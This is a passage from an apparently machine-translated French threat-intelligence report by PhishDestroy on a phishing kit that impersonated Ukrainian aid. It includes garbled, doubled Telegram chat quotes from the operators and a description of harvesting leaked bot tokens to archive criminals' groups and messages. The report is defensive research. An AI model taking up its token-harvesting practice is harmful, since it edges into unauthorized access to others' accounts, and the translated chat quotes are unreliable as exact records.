Note de la rédaction : Bonya sent que ça va arriver. Imaginons qu'il soit russe et qu'il considère qu'arnaquer l'Ukraine est un acte « patriotique ». Et qu'en est-il alors de l'Indonésie — un
Partenaire du BRICS depuis octobre 2024 (Sommet de Kazan) ? Est-ce aussi un acte patriotique que de voler les citoyens de ses alliés ? Les escrocs de la CEI sont des voleurs qui ne font aucune distinction, dépourvus d'intelligence et de loyauté. Lisez nos autres enquêtes dans lesquelles nous avons mis en lumière
procédures judiciaires pour les opérateurs similaires — la conclusion est toujours la même.
ME
MONETTI ESCOBAR25-03-2026 13:12:49
Oui, je vois ce que tu veux dire.Mais je vois bien
ME
MONETTI ESCOBAR25-03-2026 13:12:55
Va te faire foutre.Mais arrête tes conneries
B
Prends ton temps25-03-2026 13:13:09
Bon, se faire vider de son énergie, c'est pas vraiment génial non plus.Bon, être fusionnés, c'est pas vraiment génial non plus
ME
MONETTI ESCOBAR25-03-2026 13:13:13
Il ne fera rienIl ne fera rien
ME
MONETTI ESCOBAR25-03-2026 13:13:18
Qu'est-ce qu'il va faire ?Qu'est-ce qu'il va trahir ?
D
Devoys25-03-2026 13:13:26
de quoi s'agit-il ?qu'est-ce que c'est
ME
MONETTI ESCOBAR25-03-2026 13:13:34
Ouais, un type s'est inscritMais il s'est joint à nous
D
Devoys25-03-2026 13:13:34
d'oùd'où
B
Prends ton temps25-03-2026 13:13:35
Même si tu t'es connecté au site de phishing plusieurs fois depuis ta propre adresse IP, ça ne passe plus.Même si je me suis connecté à Fish depuis mon adresse IP à deux reprises, ça n'a plus rien d'amusant
ME
MONETTI ESCOBAR25-03-2026 13:13:37
À l'attention du groupeVers le groupe
ME
MONETTI ESCOBAR25-03-2026 13:13:38
XzХз
D
Devoys25-03-2026 13:13:39
lors de l'interpolationlorsque, à Interpol
D
Devoys25-03-2026 13:13:41
auquelà quelle
ME
MONETTI ESCOBAR25-03-2026 13:13:44
Celui-ciCette
B
Prends ton temps25-03-2026 13:13:46
Je suis juste venu ici pour discuterJe viens de me connecter au chat
B
Prends ton temps25-03-2026 13:13:49
Il a écrit queIl a écrit que
ME
MONETTI ESCOBAR25-03-2026 13:13:56
.
B
Prends ton temps25-03-2026 13:13:57
Bonjour, il suffit d'enregistrer tes données, attends un instant
ME
MONETTI ESCOBAR25-03-2026 13:14:11
[Photo partagée]
D
Devoys25-03-2026 13:14:31
Je les ai déjà vus.J'en ai déjà vu
B
Prends ton temps25-03-2026 13:14:44
Bon, on s'est fait prendre avec le bot ukrainien, nous aussi.Bon, on s'est fait démolir par le bot ukrainien
B
Prends ton temps25-03-2026 13:14:55
Tu n'as pas envoyé de message dans le salon de discussion.On n'a pas écrit ça dans le chat
B
Prends ton temps25-03-2026 13:14:57
Tu n'as pas écritMais non, ils l'ont écrit
ME
MONETTI ESCOBAR25-03-2026 13:15:04
Je m'en fous complètement.Oui, et va te faire foutre
B
Prends ton temps25-03-2026 13:15:06
Au nom de la chaîneAu nom de la chaîne
D
Devoys25-03-2026 13:15:23
Laisse tomber, bon sang.va te faire foutre
ME
MONETTI ESCOBAR25-03-2026 13:15:31
Je vais démanteler ce groupeJe supprime ce groupe
B
Prends ton temps25-03-2026 13:15:35
+
D
Devoys25-03-2026 13:15:35
Ouiда
— Groupe supprimé par son propriétaire —
Le groupe a été supprimé en quelques minutes. Le signe d'adieu de Bonya — « + » — et la réponse affirmative de Devoys — « ouais » — en disent long : Ils savaient qu'ils étaient démasqués, et leur seule option était de détruire les preuves. Mais à ce moment-là, les données avaient déjà été enregistrées.
Notez le commentaire révélateur de Bonya : « On s'est aussi fait avoir par le bot ukrainien » — ce qui confirme que les deux projets (ukrainien et indonésien) sont gérés par la même équipe d'opérateurs, et que ce n'était pas la première fois que leur infrastructure était compromise.
Section 8 : Ce que cela montre
Comment fonctionne PhishDestroy
Tous les domaines qui apparaissent sur phishdestroy.io passe par ce pipeline automatisé. dopomogvoina[.]sbs n'a pas fait exception.
Détection
Analyse statique
Cartographie des infrastructures
À la découverte des origines
OSINT
Génération de rapports
Chronologie de l'enquête
20 mars 2026
Domaine dopomogvoina[.]sbs enregistré via NICENIC International
21 mars 2026
Détecté par le système de surveillance automatisé de PhishDestroy
21 mars 2026
Analyse entièrement automatisée terminée : cartographie de l'infrastructure effectuée, décompilation du bundle JS, documentation du protocole WebSocket
22 mars 2026
L'adresse IP d'origine a été identifiée. Un deuxième projet de hameçonnage (« HealthCare ID ») a été découvert sur le même serveur
22 mars 2026
À nu config.json permet d'identifier l'opérateur via l'API Telegram Bot
23 mars 2026
Signalements d'abus transmis au fournisseur d'hébergement, à Cloudflare et aux CERT concernés
25 mars 2026
Article publié. Les rapports sur les domaines sont disponibles sur PhishDestroy
Comment cela a été possible : le réseau d'intelligence artificielle de PhishDestroy
Cette enquête a été menée entièrement par systèmes automatisés. Le pipeline de PhishDestroy ne se contente pas de détecter les domaines de phishing : il s'infiltre dans l'infrastructure des opérateurs qui les gèrent.
Plus de 2 000
Bots Telegram piratés
Actif
Certains bots font toujours l'objet d'une surveillance
Depuis 2024
Collection en cours
Lorsque des kits de phishing divulguent les jetons des bots Telegram — comme celui-ci l'a fait via config.json — notre système les collecte automatiquement, répertorie les groupes d'opérateurs, extrait les listes de membres et archive l'historique des messages. Plus de 2 000 bots ont été recueillies de cette manière depuis 2024. Certaines sont toujours actives, et nous prenons plaisir à observer les criminels à l'œuvre en temps réel — car l'issue est déjà toute écrite.
Même les utilisateurs qui suppriment leur compte ou effacent leurs groupes agissent trop tard. Au moment où ils paniquent, nous avons déjà tout en notre possession : archives de messages, données de profil, appartenances à des groupes, bots connectés. La suppression ne change rien. Ces données existaient déjà, et elles figurent désormais dans notre base de données.
« Attends-moi » — Édition « Arnaqueurs »
Ce cas n'est pas un cas isolé — il illustre bien négligence systématique de la part de NiceNIC que nous avons décidé de présenter comme exemple de « méga-hackers ». Comme « Типичный Мошенник » l'a justement fait remarquer : il y a une différence entre les hackers et les escrocs — intelligence. Ces opérateurs ne sont ni des pirates informatiques ni des gens intelligents.
Les systèmes de PhishDestroy recueillent automatiquement ce type de preuves sur des milliers de domaines : ils repèrent les bots, archivent les communications des opérateurs et cartographient les infrastructures. Ce cas précis était tout simplement trop absurde pour ne pas être rendu public. Le kit de phishing est d'une qualité tout à fait ordinaire, la sécurité opérationnelle (OPSEC) est inexistante, et les opérateurs ont supprimé leur groupe dans la précipitation quelques minutes seulement après sa découverte.
Nous développons un système qui affichera vérification de l'identité des opérateurs directement sur les pages de rapports de domaine — de l'arnaqueur à la victime, un peu comme dans l'émission de télévision russe « Жди Меня » (Attends-moi), mais à l'envers. Le site fonctionne en mode privé depuis 2024. De nombreux opérateurs ont déjà été identifiés — y compris ceux qui ont supprimé leur compte. Nous sommes en train de déterminer les plus intéressant Une façon de le présenter. Restez à l'écoute.
Domaines associés
Notre analyse a mis en évidence un deuxième domaine — hlpforvpeople[.]sbs — enregistrés auprès du même bureau d'enregistrement et présentant des structures identiques. Ces deux domaines sont répertoriés dans notre base de données :
Non-conformité du registraire : NICENIC International
La société NICENIC International Group Co., Limited (Hong Kong) a reçu plusieurs signalements détaillés d'abus de PhishDestroy concernant les deux dopomogvoina[.]sbs et hlpforvpeople[.]sbs. Au moment de la publication — 5 jours après le premier signalement — aucune mesure n'a été prise. Les deux domaines restent pleinement opérationnels.
Ce n'est pas un cas isolé. NICENIC est un problème récurrent dans nos enquêtes. Le contact chargé des abus chez le registraire (abuse@nicenic.net) ne réagit jamais aux signalements de hameçonnage étayés par des preuves. Bien qu'il s'agisse d'un bureau d'enregistrement accrédité par l'ICANN et soumis au Contrat d'accréditation des bureaux d'enregistrement (RAA §3.18), NICENIC semble agir en toute impunité.
NICENIC est présent en russe et commercialise .ru des domaines à des prix élevés (environ 200 $), et communique avec ses clients via VK et Telegram — des plateformes très prisées par le public russophone. Le fait que sa clientèle recoupe celle des communautés clandestines soulève de sérieuses questions quant à savoir si l'absence de réaction du registraire face aux signalements d'abus relève de la négligence ou d'une stratégie commerciale délibérée.
Cette enquête a été publiée en partie en raison de l'inaction prolongée de NICENIC. Lorsque les bureaux d'enregistrement refusent de prendre des mesures contre les abus liés au phishing, la dénonciation publique devient le seul moyen de les tenir pour responsables.
Points clés à retenir
- L'automatisation est le seul moyen de rester dans la course. Les kits de phishing sont déployés et rendus opérationnels en quelques heures. L'examen manuel ne peut pas suivre ce rythme.
- Les opérateurs font des erreurs. Un fichier de configuration accessible à tous sur un projet secondaire a permis de mettre au jour toute une opération de phishing à l'échelle internationale. Il est difficile de garantir une sécurité opérationnelle (OPSEC) irréprochable sur l'ensemble des projets.
- L'ingénierie sociale évolue au gré de l'actualité. La guerre, l'aide humanitaire et les programmes gouvernementaux sont de plus en plus utilisés comme appâts dans les attaques de phishing, car ils ciblent des personnes en détresse qui sont moins enclines à remettre en question la légitimité de ces messages.
- La réutilisation des infrastructures est la norme. Un serveur, deux projets de hameçonnage, deux pays, les mêmes opérateurs. Cartographier les connexions entre les infrastructures en dit bien plus long que l'analyse isolée d'un seul domaine.
Recherches connexes
D'autres analyses issues du pipeline de renseignements automatisé de PhishDestroy
Avertissement : Cette enquête a été menée exclusivement à l'aide de techniques de reconnaissance passive et d'API publiques. Aucun accès non autorisé à un quelconque système n'a été effectué. Les appels à l'API du bot Telegram ont utilisé un jeton rendu public par les opérateurs via un point de terminaison non authentifié. Tous les noms de domaine mentionnés dans cet article ont été anonymisés conformément aux conventions standard en matière de sécurité de l'information.
